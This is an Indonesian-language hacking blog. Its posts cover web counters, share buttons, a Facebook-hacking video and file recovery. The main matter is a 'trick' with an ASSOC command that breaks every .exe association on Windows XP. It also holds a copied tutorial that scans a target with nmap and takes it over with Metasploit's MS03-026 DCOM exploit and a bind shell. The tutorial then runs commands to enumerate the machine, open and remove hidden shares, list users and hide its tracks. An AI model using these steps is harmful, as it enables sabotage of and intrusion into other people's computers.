E-book Hacking

Posted by Bl4ckB0y On 06.56 6 comments

Add Counter Information

Posted by Bl4ckB0y On 10.05 0 comments

biasanya dalam sebuah web terdapat sebuah web counter yang fungsinya untuk menghitung jumlah pengunjung yang telah membuka web tersebut. nah trik kali ini adalah bagai mana menambahkan sebuah counter web dalam blog kita.
setelah kesana-kemari, akhirnya ketemu juga cara untuk mendapatkan counter web secara gratis dan murah. yap tinggal arahkan browser ke http://www.bestfreehitcounters.com, disana banyak pilihan bentuk dan gambar hit counter yang disediakan silakan pilih salah satu dengan mengklik, anda akan dibawa ke bagian yang paling penting, masukan nama blog pada pagename, dan biarkan yang lain apa adanya. senjutnya klik pada button bertuliskan "click here for get the code" dan anda akan diberikan sebuah kode.



masuk ke bloger dan pilih customize, pilih bagian edit html. dan masukan kode tadi dimanapun yang diinginkan. atau jika ingin mudah cari widget yang mendukung code HTML/javascript dan masukan disana. berikut gambarnya.

masukan kodenya disana, dengan memasukannya pada widget akan menjadi lebih mudah. klik save. jika berhasil hasilnya akan seperti ini

atau bisa dilihat di pojok kanann atas blog ini...

selamat mencoba. gampang kok...

Add-this Button

Posted by Bl4ckB0y On 15.59 0 comments

Ingin Menambah Button Share dan lain-lain seperti miliki dibawah ini...gampang saja kok...kunjungi

http://www.addthis.com/
disana ada pilihan buat register..langsung lakukan register seperti biasa..kemudian sampailah pada bagian dimana kita memilih jenis button...terdapat pula pilihan untuk website atau blogger. jangan sampai lupa untuk masalah ini karena sangat penting untuk masalah pemberian kode. lalu klik next dan copy pastekan kode yang tertullis pada web ke html blog atau kode website teman-teman
selamat mencoba...

Hack Facebook

Posted by Bl4ckB0y On 12.12 6 comments

video ini saya ambil dari youtube..tampak begitu mudahnya melakukan hacking facebook dengan bantuan tool-tool dari internet...

hanya dengan bantuan www.rayahari.com dalam beberapa detik facebook bisa dihacking dengan mudah tanpa perlu susah-susah bahkan oleh seorang newbie sekalipun...tapi ketika penulis coba ternyata yang terjadi malah mbulet tiada tara. kalau ada yang bisa mohon kasih tau yah.....

Recovery Documents

Posted by Bl4ckB0y On 09.51 0 comments

salah satu hal yang paling menjengkelkan bagi kita pada komputer adalah saat dimana kita mendapatai bahwa file kita yang paling penting tiba-tiba rusak entah karena apa...banyak orang yang sampai rela mengorbankan ratusan ribu hanya untuk mengembalikan file yang sudah rusak tersebut.banyak sekali penyebab rusaknya file pada sebuah hardisk. bisa terjadi karena cacat fisik hardisk, kena serangan virus, bad sector, tidak sengaja terhapus dan kerusakan-kerusakan yang lain. ada yang bisa dikembalikan dan ada pula yang tidak.
dan untuk kali ini saya mencoba memberikan beberapa tipntrick untuk menyelamatkan data yang sudah KO dari harddisk kita...

1. Kena Serangan Virus
pada dasarnya sebuah file yang rusak akibat diserang virus sudah tidak bisa lagi diharapkan keselamatanya. namun untuk beberapa jenis virus tertentu yang kadang-kadang sebenarnya tidak menyerang sebuah file, tapi hanya menghidden sebuah file tersebut dan membuat file virus baru yang dimirip-miripkan seperti file asli, baik melalui icon dan nama sekaligus filetypeny. pengguna yang kurang jeli tentu akan frustasi dan langsung bunuh diri (Cuma bercanda...) karena hal ini. tapi pengguna yang professional akan merasa tertantang dan punya cara tersendiri untuk merecovery data-data tersebut.
untuk virus-virus buatan indonesia pada dasarnya bukan virus yang terlalu horor asalkan tahu ciri khas virus dan metode awal pencegahan. silakan lihat postingan saya untuk metode pencegahan, judulnya "aman tanpa antivirus", disana terdapat banyak cara menanggulangi virus tanpa antivirus.
kembali lagi ke virus indonesia. pada dasarnya virus-virus bikinan anak dalam negeri hanya menhidden file asli dan membuat/menggenerate dirinya sendiri untuk menyamarkan diri seperti layaknya file asli tersbut. pengguna yang awam akan mengira file tiruan ini sebagai file asli, sehingga mengkopinya ke flasdisk dan menjalankanya di komputer lain dengan cara inilah virus meyebar. makanya kadang saya mendengar ada file yang kena virus dibuka dikompie yang kena virus bisa dan dibuka dikompie lain tidak bisa. sebenarnya yang terjadi, anggaplah kita mempunyai file data.doc dengan atribut show seperti biasa. oleh virus atribut akan diubah menjadi hidden, dan virus akan mengkopikan dirinya ke satu folder dengan file kemudian menyamarkan dirinya menjadi data.doc.exe, jika kita mengklik file data.doc.exe (virus). maka kita sudah menjalankan virus tersebut, kemudian virus akan mengeksekusi perintah open_document(data.doc), sehingga ia OS akan membuka file data.doc dengan default programnya yakni ms.office, sehingga kita terkecoh. padahal jika kita membuka file data.doc (file asli), tanpa perantara virus sebenarnya juga bisa. dari kondisi ini, jika kita pengguna mengkopi file data.doc.exe (virus) tanpa mengkopi data yang asli (data.doc) maka tentu saja dikomputer lain tidak ada karena file ini memang tidak pernah ada, dan ini yang kadang dianggap sebagai file rusak oleh pengguna awam.

ada beberapa virus-virus yang dibuat oleh programmer lokal yanng saya anggap handal. kalau tidak salah namanya virus antiporno, karena ia akan mengenkripsi semua file .jpg dan .3gp, kalau yang seperti ini baru benar-benar sulit karena kita harus mendenkrip ulang virus dan membaca teknik enkripsi dengan bahasa asembly. kemudian kita buat denkripsinya, dan tentu tidak banyak orang yang bisa begini. untuk kasus yang seperti ini, jika datanya memang menyangkut hidup mati anda, sebaiknya bawa ke para penyedia jasa file recovery, tapi jangan tanya harganya (setahuku sekitar 5 juta untuk harrdisk 1 GB).

2. cacat Harddisk

kalau yang begini baru kita bisa bilang "Hanya Allah harapanku". data eletronik sebenarnya disimpan dalam bit-bit tertentu yang satu sama lain saling terkait, satu bit saja rusak bisa mengakibatkan seluruh data rusak. jika ini yang terjadi silakan berdo'a saja karen atak banyak yang dapat diperbuat. saya juga tidak bisa memeberikan tip disini karena memang menyagkut masalah hardware sehingga hanya orang teknisi yang bisa memperbikinya. mohon maaf...

3. Salah Hapus

kalau yang ini tergantung dari OS anda dan cara menghapus yang bagaimana yang dilakukan. di windows sekalipun data telah dihapus dari recycle bin data masih bisa kembali selama lokasi penyimpanan belum di timpa (overwrite) dengan data lain. kok bisa ?...tentu saja, ketika kita menhapus dari recycle bin, windows tidak serta merta menhapus data, yanng dilakukan windows hanya menhapus head dari sebuah file, sehingga sevara logic data sudah hilang, tapi secara fisik data masih ada, selama data lain tidak menimpa alamat lokasinya, karena logic windows mengatakan alamat xx dan yy dari file ini telah dihapus dan bisa diisi dengan data lain. nah disinilah program Recovery bekerja, caranya dengan membaca seluruh isi harddisk entah itu mengandung head atau tidak, makanya pada program recovery terdapat persentase keselamatan karena bisa saja sebagian dari alamat memori program yang lama, sudah tertimpa data lain. sebenarnya teknik ini juga dimanfaatkan para hacker untuk mencuri data yang menurut pengguna awam sudah dihapus. banyak program untuk melakukan recovery file, silakan cari di google.

lalu bagaimana dengan program sredder seperti Tune Up Shredder yang katanya bersih 100%..? nah kalau yang ini memang bener-bener hilang 100%, mengapa karena ketika kita menghapus sebuah file lewat program shredder, yang terjadi adalah data dihapus headnya, kemudian dibebeaskan memorinya, lalu ditimpa datanya dengan data sampah pada seluruh lokasi memeori penyimpanan, kemudian data sampah dihapus lagi dibebaskan memorinya lagi, dan ditimpa dengan data sampah lagi..terus menerus sampai bebebrapa kali, kemudian data sampah dihapus headnya, sehingga jika program recovery dijalankan yang terbaca buka file yang lama, melainkan file sampah karena data sudah benar-benar ditimpa (overwrite) oleh data lain. jika tak sengaja menghapus dengan cara seperti ini, dan itu adalah data kantor yang harus diserahkan kepada bos, sebaiknya bedo'a saja semoga bos tidak menendang pantat anda dari kantor.

Xp-Zombie

Posted by Bl4ckB0y On 16.51 3 comments

trik ini sebenarnya ditulis oleh Xmoensen mungkin sudah agak lama tapi apa salahnya di coba....
===========================================
trik ini bisa membuat windows XP versi berapapu langsung mati dalam beberapa detik saja...
caranya gampang buka cmd...start->run ketik cmd dan langsung jalan
kemudian ketikan kode berikut :
# ASSOC .exe=.m0d4r

tunggu beberapa saat dan dijamin komputer langsung gak jalan, semua file berekstensi .exe jika dibuka propertisnya akan bertipe .m0d4r, padahal program m0d4r gak ada..jadi semua file .exe termasuk file virus ata apapun itu akan tewas wal seketika.....
trus balikinya bagaimana?.......gak bisa.....kenapa? karena ASSOC adalah sebuah progrma kecil bawaan XP yang akan melakukan associasi extensi file...dan karena program .exe ia juga terkena imbasnya....kalau ingin dibalik

# ASSOC .m0d4r=.exe

tetep gak jalan karena semua file executable telah mati...termasuk ASSOC sendiri...
cara balikinya yang palin ggampang ya di install ulang....
hahahaha....

Nyolong Windows

Posted by Bl4ckB0y On 04.48 0 comments

waduh panjang banget tipnya..ini tak ambil dari yogyafree ditulis oleh 

fl3xu5[at]fl3xu5.web.id..karena males ngedit jadi tak copas apa adanya...

dari bawah ini sampe..abis adalah tulisan asli...dari fl3xu5[at]fl3xu5.web.id....

====================================================================

Bismillahirrahmaanirrahiim 


---"4 Commands to takeover windows machine" - 



-[*] Starting the Metasploit Framework... 


o 8 o o 
8 8 8 
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P 
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8 
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8 
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8 
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..: 
::::::::::::::::::::::::::::::::::8::::::::::::::::::::::: 
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 


+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads] 

msf > use msrpc_dcom_ms03_026 
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind 
PAYLOAD -> win32_bind 
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 172.16.0.5 
RHOST -> 172.16.0.5 
msf msrpc_dcom_ms03_026(win32_bind) > exploit 
[*] Starting Bind Handler. 
[*] Sending request... 
[*] Got connection from 172.16.0.3:3766 <-> 172.16.0.5:4444 

Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C:\WINDOWS\system32> 


Yup 4 command dalam metasploit digunakan untuk exploitasi windows machine 
(dalam hitungan detik saja bukan ;p ). 
Begitulah gambaran singkat nya. 
Upzz tapi kurang menarik tanpa kita bahas lebih dalam  
Sip ok mari kita bahas satu persatu biar lebih menarik.. 

-Read This article on below carefully!!- 

-Perhatian & Pemberitahuan !! : 
=================================- 

-Artikel ini hanya ditujukan sebagai informasi & pengetahuan untuk siapa 
saja yang membaca artikel ini. So pergunakan informasi ini sebaik 
mungkin.jangan sampe disalahgunakan. Segala akibat dari penyalahgunaan 
artikel ini merupakan tanggung jawab pelaku. 
Penulis tidak bertanggungjawab atas penyalahgunaan artikel ini. - 

-Dipersilahkan memperbanyak artikel ini dengan ijin ataupun tanpa izin 
dari penulis dengan tujuan non profit, dengan tetap mencantumkan kredit 
atas penulis. 


----===== Pengantar =====---- 
Sebenarnya artikel ini sudah agak basi dan kurang berbobot, penulis 
menyadari akan hal ini akan tetapi tidak ada salahnya penulis mencoba 
share dengan sedikit modifikasi untuk pembaca sehingga semoga bermanfaat. 
amien... 

Note : bagi anda yang sudah merasa jago silahkan quit cepat cepat dari 
artikel ini daripada buat boring :p.dan silahkan buat artikel yang jauh 
lebih bagus dari ini!!  
-because i am just ordinary human | No body is perfect..- 

----===== Isi =====---- 

-1. Apa dan bagaimana ?- 
-Artikel ini merupakan bagaimana cara mendapatkan mesini windows 
alias take over windows (xP or win2000 ) menggunakan metasploit dengan 
memakai exploit msrpc_dcom_ms03_026, serta nanti kita akan bermain2 
di cmd target saat kita sudah take over mesin wind* itu dengan akses 
tertinggi (adminstrator, layaknya root di linux/*nix ;p).- 

-Open and Explore your mind !! - 


2. Tool and Peripheral -: 


-attacker : - PC Desktop OS Windows 
- nama komputer fl3xu5 
- IP address 172.16.0.3 
- metasploit v2.7 (http://metasploit.com) 
- scanner (terserah). 

target : - laptop dengan OS Windows XPSP1 :p 
- nama komputer kidz 
- IP address 172.16.0.5 

peripheral lain 
- cross cable , UnShielded Twisted Pair , dengan rj45 
*yup percobaan kali ini dilakukan dengan peer to peer  
mumpung ada pinjeman laptop ;p 
- iringan winamp with Dream theater "Strange dejavu" ;p- 



-Ok langsung ajah ya biar ga kelamaan  

3. -Mulai lakukan serangan ;p Lets Started !!- 
-3.1. Scanning- 
OK seperti pada umumnya yang dilakukan dalam proses hacking 
adalah scanning proses : 
pake nmap aja biar cepet dan praktis  


G:\> nmap 172.16.0.5 

Starting nmap 3.48 ( http://www.insecure.org/nmap/ ) at2004-03-23 23:00WIT 
Interesting ports on 172.16.0.5: 
(The 1652 ports scanned but not shown below are in state: closed) 
PORT STATE SERVICE 
135/tcp open msrpc 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
1025/tcp open NFS-or-IIS 
5000/tcp open UPnP- 



wew ternyata port 134 nya terbuka ;p moga moga aja bisa di exploitasi 
rpc nya (berdoa aja duluw ;p) 

-3.2 exploitasi System via port 135 yang kebuka tadi.- 
Kali ini kita pake metasploit versi2.7, bisa didwonload di situs resmi 
nya http://metasploit.com. Bisa juga pake exploit lain spt KAHT2 dll. 



-[*] Starting the Metasploit Framework... 


o 8 o o 
8 8 8 
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P 
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8 
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8 
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8 
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..: 
::::::::::::::::::::::::::::::::::8::::::::::::::::::::::: 
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 


+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads] 

msf > use msrpc_dcom_ms03_026 
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind 
PAYLOAD -> win32_bind 
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 172.16.0.5 
RHOST -> 172.16.0.5 
msf msrpc_dcom_ms03_026(win32_bind) > exploit 
[*] Starting Bind Handler. 
[*] Sending request... 
[*] Got connection from 172.16.0.3:3766 <-> 172.16.0.5:4444 

Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C:\WINDOWS\system32> <-- ok, kita berhasil masuk ke cmd target:)- 


-Point penting yang perlu diperhatikan adalah 
- target IP : 172.16.0.5 
- IP attacker : 172.16.0.3 
- port yang digunakan untuk koneksi: 
port 3766 <-- portnya attacker utk koneksi dng target 
port 4444 <-- portnya target.- 

YUp artinya kita dah takeover mesin target itu dan kedudukan kita 
sebagai administrator (dengan akses tertinggi ;p) 
nah enaknya ngapain ya kalo dah takeover gini?? 
yuuukk kita coba explore2 yuu  
*laykanya kita explore dengan cmd di mesin kita sendiri ;p tentunya 
dengan DOS command... 
-jangan lupa tuk diingat 
attacker : - IP address 172.16.0.3 
target : - IP address 172.16.0.5- 
Mulai yuu ;p 
-3.3 Analisa dengan netstat -a- 
- Pada mesin attacker : 


G:\Documents and Settings\fl3xu5>netstat -a 

Active Connections 

Proto Local Address Foreign Address State 
TCP fl3xu5:smtp fl3xu5:0 LISTENING 
TCP fl3xu5:finger fl3xu5:0 LISTENING 
TCP fl3xu5:http fl3xu5:0 LISTENING 
TCP fl3xu5:pop3 fl3xu5:0 LISTENING 
TCP fl3xu5:epmap fl3xu5:0 LISTENING 
TCP fl3xu5:microsoft-ds fl3xu5:0 LISTENING 
TCP fl3xu5:2869 fl3xu5:0 LISTENING 
TCP fl3xu5:6017 fl3xu5:0 LISTENING 
TCP fl3xu5:1028 fl3xu5:0 LISTENING 
TCP fl3xu5:3306 fl3xu5:0 LISTENING 
TCP fl3xu5:netbios-ssn fl3xu5:0 LISTENING 
TCP fl3xu5:3766 172.16.0.5:4444 ESTABLISHED 
UDP fl3xu5:microsoft-ds *:* 
UDP fl3xu5:isakmp *:* 
UDP fl3xu5:1025 *:* 
UDP fl3xu5:1026 *:* 
UDP fl3xu5:1049 *:* 
UDP fl3xu5:1050 *:* 
UDP fl3xu5:1051 *:* 
UDP fl3xu5:1052 *:* 
UDP fl3xu5:1053 *:* 
UDP fl3xu5:1054 *:* 
UDP fl3xu5:1055 *:* 
UDP fl3xu5:1056 *:* 
UDP fl3xu5:4500 *:* 
UDP fl3xu5:ntp *:* 
UDP fl3xu5:1900 *:* 
UDP fl3xu5:ntp *:* 
UDP fl3xu5:1027 *:* 
UDP fl3xu5:1900 *:* 
UDP fl3xu5:4293 *:* 
UDP fl3xu5:ntp *:* 
UDP fl3xu5:netbios-ns *:* 
UDP fl3xu5:netbios-dgm *:*- 



- Pada mesin target (cmd target) ketik : 


C:\WINDOWS\system32>netstat -a 
Active Connections 

Proto Local Address Foreign Address State 
TCP kidz:epmap kidz:0 LISTENING 
TCP kidz:microsoft-ds kidz:0 LISTENING 
TCP kidz:1025 kidz:0 LISTENING 
TCP kidz:1032 kidz:0 LISTENING 
TCP kidz:gds_db kidz:0 LISTENING 
TCP kidz:4444 kidz:0 LISTENING 
TCP kidz:5000 kidz:0 LISTENING 
TCP kidz:7551 kidz:0 LISTENING 
TCP kidz:netbios-ssn kidz:0 LISTENING 
TCP kidz:1370 kidz:0 LISTENING 
TCP kidz:1382 kidz:0 LISTENING 
TCP kidz:1445 kidz:0 LISTENING 
TCP kidz:1454 kidz:0 LISTENING 
TCP kidz:1699 kidz:0 LISTENING 
TCP kidz:1866 kidz:0 LISTENING 
TCP kidz:3859 kidz:0 LISTENING 
TCP kidz:4444 172.16.0.3:3766 ESTABLISHED 
UDP kidz:epmap *:* 
UDP kidz:microsoft-ds *:* 
UDP kidz:isakmp *:* 
UDP kidz:1026 *:* 
UDP kidz:1027 *:* 
UDP kidz:1028 *:* 
UDP kidz:1581 *:* 
UDP kidz:1582 *:* 
UDP kidz:1583 *:* 
UDP kidz:1584 *:* 
UDP kidz:1585 *:* 
UDP kidz:1586 *:* 
UDP kidz:1587 *:* 
UDP kidz:1588 *:* 
UDP kidz:1589 *:* 
UDP kidz:7550 *:* 
UDP kidz:ntp *:* 
UDP kidz:1033 *:* 
UDP kidz:1900 *:* 
UDP kidz:ntp *:* 
UDP kidz:netbios-ns *:* 
UDP kidz:netbios-dgm *:* 
UDP kidz:1900 *:*- 



-Coba perhatikan dari hasil netstat -a bahwa : 
Proto = artinya menunjukkan protokol yang digunakan 
Local Address = address lokal komputer yang bersangkutan (dalam 
hal ini adalah kidz), dan port yang digunakannya. 
Foreign Address = menunjukkan address asing yang sedang melakukan 
koneksi. 
State = menunjukkan status koneksi. 

Nah coba perhatikan diatas, 
TCP kidz:4444 172.16.0.3:3766 ESTABLISHED 
artinya bahwa kidz (komputer target) menggunakan port 4444 untuk 
terkoneksi dengan IP 172.16.0.3 (Ip attacker) dengan port attacker 
adalah 3766 dimana status keduanya adalah ESTABLISHED (berhasil 
terkoneksi ). 
Hal ini cocok dengan attacker : 
TCP fl3xu5:3766 172.16.0.5:4444 ESTABLISHED 

Coba bandingkan dengan kondisi target sebelum terexploitasi: 


C:\WINDOWS\system32>netstat -a 
Active Connections 

Proto Local Address Foreign Address State 
TCP kidz:epmap kidz:0 LISTENING 
TCP kidz:microsoft-ds kidz:0 LISTENING 
TCP kidz:1025 kidz:0 LISTENING 
TCP kidz:1032 kidz:0 LISTENING 
TCP kidz:gds_db kidz:0 LISTENING 
TCP kidz:4444 kidz:0 LISTENING 
TCP kidz:5000 kidz:0 LISTENING 
TCP kidz:7551 kidz:0 LISTENING 
TCP kidz:netbios-ssn kidz:0 LISTENING 
TCP kidz:1370 kidz:0 LISTENING 
TCP kidz:1382 kidz:0 LISTENING 
TCP kidz:1445 kidz:0 LISTENING 
TCP kidz:1454 kidz:0 LISTENING 
TCP kidz:1699 kidz:0 LISTENING 
TCP kidz:1866 kidz:0 LISTENING 
TCP kidz:3859 kidz:0 LISTENING 
UDP kidz:epmap *:* 
UDP kidz:microsoft-ds *:* 
UDP kidz:isakmp *:* 
UDP kidz:1026 *:* 
UDP kidz:1027 *:* 
UDP kidz:1028 *:* 
UDP kidz:1581 *:* 
UDP kidz:1582 *:* 
UDP kidz:1583 *:* 
UDP kidz:1584 *:* 
UDP kidz:1585 *:* 
UDP kidz:1586 *:* 
UDP kidz:1587 *:* 
UDP kidz:1588 *:* 
UDP kidz:1589 *:* 
UDP kidz:7550 *:* 
UDP kidz:ntp *:* 
UDP kidz:1033 *:* 
UDP kidz:1900 *:* 
UDP kidz:ntp *:* 
UDP kidz:netbios-ns *:* 
UDP kidz:netbios-dgm *:* 
UDP kidz:1900 *:*- 



silahkan perbedaanya , jelas bukan  

4. Explorasi lebih dalam di mesin target ;p- 


C:\WINDOWS\system32>cd\ 
cd\ 
C:\>dir /a <--- tampilin isi direkory 
dir /a 
Volume in drive C is systemZ 
Volume Serial Number is 634Q-5H3W 

Directory of C:\ 

12/06/2007 01:36 pagi <dir>$VAULT$.AVG 
03/04/2003 01:57 pagi 0 AUTOEXEC.BAT 
06/03/2003 04:55 sore 193 boot.ini 
06/02/2003 01:57 sore 0 CONFIG.SYS 
22/05/2007 05:52 sore <dir> Documents and Settings 
26/06/2007 11:20 pagi 255.876.614 hiberfil.sys 
18/04/2007 07:27 pagi <dir>Inprise 
05/02/2003 01:57 sore 0 IO.SYS 
09/05/2003 01:57 pagi 0 MSDOS.SYS 
27/03/2002 04:08 sore 35.487 NTDETECT.COM 
23/05/2002 08:05 sore 343.598 ntldr 
28/02/2007 11:20 pagi 453.365.387 pagefile.sys 
23/01/2007 03:54 sore 14.243 PDOXUSRS.NET 
29/05/2007 12:22 pagi <dir> Program Files 
23/03/2007 05:55 pagi <dir> RECYCLER 
04/05/2003 02:02 pagi <dir>System Volume Information 
22/02/2007 11:39 pagi <dir> WINDOWS 
10 File(s) 564.767.298 bytes 
7 Dir(s) 4.387.087.073 bytes free- 



nah coba ah liat ada berapa OS nih di PC target ...caranya ?? 


C:\>type boot.ini 
type boot.ini 
[boot loader] 
timeout=6 
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS 
[operating systems] 
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect- 


wah ternyata cuma 1 oS yaitu windows... 

nah ada direktory program files tuh, coba intip yuu ;p 


C:\>cd program files 
cd program files 

C:\Program Files>dir /a 
dir /a 
Volume in drive C is systemZ 
Volume Serial Number is 634Q-5H3W 

Directory of C:\Program Files 

23/09/2007 12:22 pagi <dir> . 
12/09/2007 12:22 pagi <dir> .. 
21/09/2007 10:57 pagi <dir> Adobe 
13/09/2007 02:46 sore <dir> BORGChat 
18/09/2007 07:25 sore <dir> Borland 
21/09/2007 07:21 sore <dir> Common Files 
12/01/2003 01:54 pagi <dir> ComPlus Applications 
13/01/2003 04:11 pagi <dir> Grisoft 
08/09/2007 10:57 pagi <dir> InstallShield Installation Information 
15/01/2003 01:56 pagi <dir> Internet Explorer 
05/09/2007 07:26 sore <dir> JavaSoft 
14/01/2003 02:38 pagi <dir> K-Lite Codec Pack 
15/01/2003 01:53 pagi <dir> Messenger 
04/09/2007 09:51 pagi <dir> Microsoft ActiveSync 
15/01/2003 01:58 pagi <dir> microsoft frontpage 
05/09/2007 09:51 pagi <dir> Microsoft Office 
06/09/2007 09:51 pagi <dir> Microsoft.NET 
18/09/2007 01:35 sore <dir> mIRC 
22/01/2003 01:55 pagi <dir> Movie Maker 
29/01/2003 01:53 pagi <dir> MSN 
15/01/2003 01:53 pagi <dir> MSN Gaming Zone 
19/01/2003 01:55 pagi <dir> NetMeeting 
17/01/2003 01:56 pagi <dir> Online Services 
15/09/2007 12:14 pagi <dir> Opera 
13/01/2003 01:55 pagi <dir> Outlook Express 
18/01/2003 02:03 pagi <dir> Uninstall Information 
14/09/2007 08:37 sore <dir> Winamp 
18/09/2007 05:53 sore <dir> Windows Media Player 
14/01/2003 01:53 pagi <dir> Windows NT 
04/09/2007 03:14 sore <dir> WindowsUpdate 
05/09/2007 10:17 pagi <dir> WinRAR 
06/09/2007 10:20 pagi <dir> XemiComputers 
13/01/2003 01:58 pagi <dir> xerox 
05/09/2007 11:45 sore <dir> Yahoo! 
0 File(s) 0 bytes 
34 Dir(s) 5.319.032.098 bytes free- 



apalagi ya ?? oiya iseng buat direktory yuu ..ups tapi cepet2 
dihapus ya..biar ga ketahuan segera hapus jejak  


C:\>mkdir test 
mkdir test 
C:\>dir /a 

Volume in drive C is systemZ 
Volume Serial Number is 634Q-5H3W 

Directory of C:\ 

12/06/2007 01:36 pagi <<dir> $VAULT$.AVG 
03/04/2003 01:57 pagi 0 AUTOEXEC.BAT 
06/03/2003 04:55 sore 193 boot.ini 
06/02/2003 01:57 sore 0 CONFIG.SYS 
22/05/2007 05:52 sore <dir> Documents and Settings 
26/06/2007 11:20 pagi 255.876.614 hiberfil.sys 
18/04/2007 07:27 pagi <dir> Inprise 
05/02/2003 01:57 sore 0 IO.SYS 
09/05/2003 01:57 pagi 0 MSDOS.SYS 
27/03/2002 04:08 sore 35.487 NTDETECT.COM 
23/05/2002 08:05 sore 343.598 ntldr 
28/02/2007 11:20 pagi 453.365.387 pagefile.sys 
23/01/2007 03:54 sore 14.243 PDOXUSRS.NET 
29/05/2007 12:22 pagi <dir>Program Files 
23/03/2007 05:55 pagi <dir> RECYCLER 
04/05/2003 02:02 pagi <dir> System Volume Information 
24/09/2007 01:07 sore <dir> test 
22/02/2007 11:39 pagi <dir> WINDOWS 
10 File(s) 564.767.298 bytes 
7 Dir(s) 4.387.087.073 bytes free 
asyik dah berhasil tuh membuat direktori test ;p.. nih : 
24/09/2007 01:07 sore <dir>test- 



buruan ah hapus, biar ga ketahuan nyusup :p 


C:\>rmdir test 
rmdir test 
C:\> dir /a 
dir /a 
Volume in drive C is systemZ 
Volume Serial Number is 634Q-5H3W 

Directory of C:\ 

12/06/2007 01:36 pagi <dir> $VAULT$.AVG 
03/04/2003 01:57 pagi 0 AUTOEXEC.BAT 
06/03/2003 04:55 sore 193 boot.ini 
06/02/2003 01:57 sore 0 CONFIG.SYS 
22/05/2007 05:52 sore <dir>Documents and Settings 
26/06/2007 11:20 pagi 255.876.614 hiberfil.sys 
18/04/2007 07:27 pagi <dir>Inprise 
05/02/2003 01:57 sore 0 IO.SYS 
09/05/2003 01:57 pagi 0 MSDOS.SYS 
27/03/2002 04:08 sore 35.487 NTDETECT.COM 
23/05/2002 08:05 sore 343.598 ntldr 
28/02/2007 11:20 pagi 453.365.387 pagefile.sys 
23/01/2007 03:54 sore 14.243 PDOXUSRS.NET 
29/05/2007 12:22 pagi <dir>Program Files 
23/03/2007 05:55 pagi <dir> RECYCLER 
04/05/2003 02:02 pagi <dir> System Volume Information 
22/02/2007 11:39 pagi <dir> WINDOWS 
10 File(s) 564.767.298 bytes 
7 Dir(s) 4.387.087.073 bytes free- 



nah sekarang maen2 yang berhubungan dengan networking yuu 
biar tambah asyik... 
coba ah liat apa aja yang di share : 


C:\> d: 
D:\>net share 
net share 

Share name Resource Remark 

---------------------------------------------------------------- 
IPC$ Remote IPC 
D$ D:\ Default share 
F$ F:\ Default share 
ADMIN$ C:\WINDOWS Remote Admin 
C$ C:\ Default share 
E$ E:\ Default share 
The command completed successfully.- 



nah ternyata masih default tuh share share an nya..ada IPC$,D$, 
F$,ADMIN$,C$,E$. 

Coba explore direktory lain ah ...;p 


D:\>dir /a 
dir /a 
Volume in drive D is konami 
Volume Serial Number is 2876-28BY 

Directory of D:\ 

14/03/2007 01:38 pagi <dir> System Volume Information 
18/05/2007 12:23 sore <dir> funny 
05/09/2007 12:31 sore <dir> Recycled 
04/03/2007 07:43 sore <dir> installerzzz 
05/05/2007 12:20 sore <dir> Templates 
19/01/2007 04:44 sore 23 tutut.txt 
05/05/2007 12:11 pagi <dir> $VAULT$.AVG 
1 File(s) 23 bytes 
6 Dir(s) 4.584.785.237 bytes free- 



upzz ada direktory installer, kayaknya ini isi nya installer2/ 
software2 buat windows ya?? ga tahu juga ding, liat aja yuu :p 
tapi enaknya coba di share aja biar lebih enak dan menantang ;p 



D:\>net share i$=d:/installerzzz 
net share i$=d:/installerzzz 
i$ was shared successfully.- 



catatan : option $ digunakan supaya share nya di hidden biar ga 
keliatan ;p 

Coba liat dah berhasil di share blom yakk... 


D:\>net share 
net share 

Share name Resource Remark 

----------------------------------------------------------------- 
IPC$ Remote IPC 
D$ D:\ Default share 
i$ d:\installerzzz 
F$ F:\ Default share 
ADMIN$ C:\WINDOWS Remote Admin 
C$ C:\ Default share 
E$ E:\ Default share 
The command completed successfully.- 



asyik dah berhasil di share tuh dengan share name i$ ;p 
nah cepetan copi or liat2 tuh yang telah di share tadi, coz 
biar ga kelamaan di share..Nah kalo dah selese, segera di unshare 
ya ;p (sekali lagi kita maen bersih, be invisible ;p) 
cara nya gmn dunk unshare?? 


D:\>net share i$ /delete 
net share i$ /delete 
i$ was deleted successfully.- 



Sip dah diunshare tuh..masa sih?? yukk kita lihat bareng: 


D:\>net share 
net share 

Share name Resource Remark 

-------------------------------------------------------------------- 
IPC$ Remote IPC 
D$ D:\ Default share 
F$ F:\ Default share 
ADMIN$ C:\WINDOWS Remote Admin 
C$ C:\ Default share 
E$ E:\ Default share 
The command completed successfully.- 



oiya sip dah di unshare... 

wah enaknya liat yuu siapa aja user yang ada di PC target.. 


D:\>net user 
net user 

User accounts for \\ 

---------------------------------------------------------------------- 
Administrator Guest HelpAssistant 
kidz SUPPORT_388945a0 
The command completed with one or more errors.- 



nah tuh banyak user ternyata disitu, sekarang kita coba lihat 
properties dari salah satu user nya,misal user administrator. 


D:\>net user Administrator 
net user Administrator 
User name Administrator 
Full Name 
Comment Built-in account for administering the computer/domain 
User's comment 
Country code 000 (System Default) 
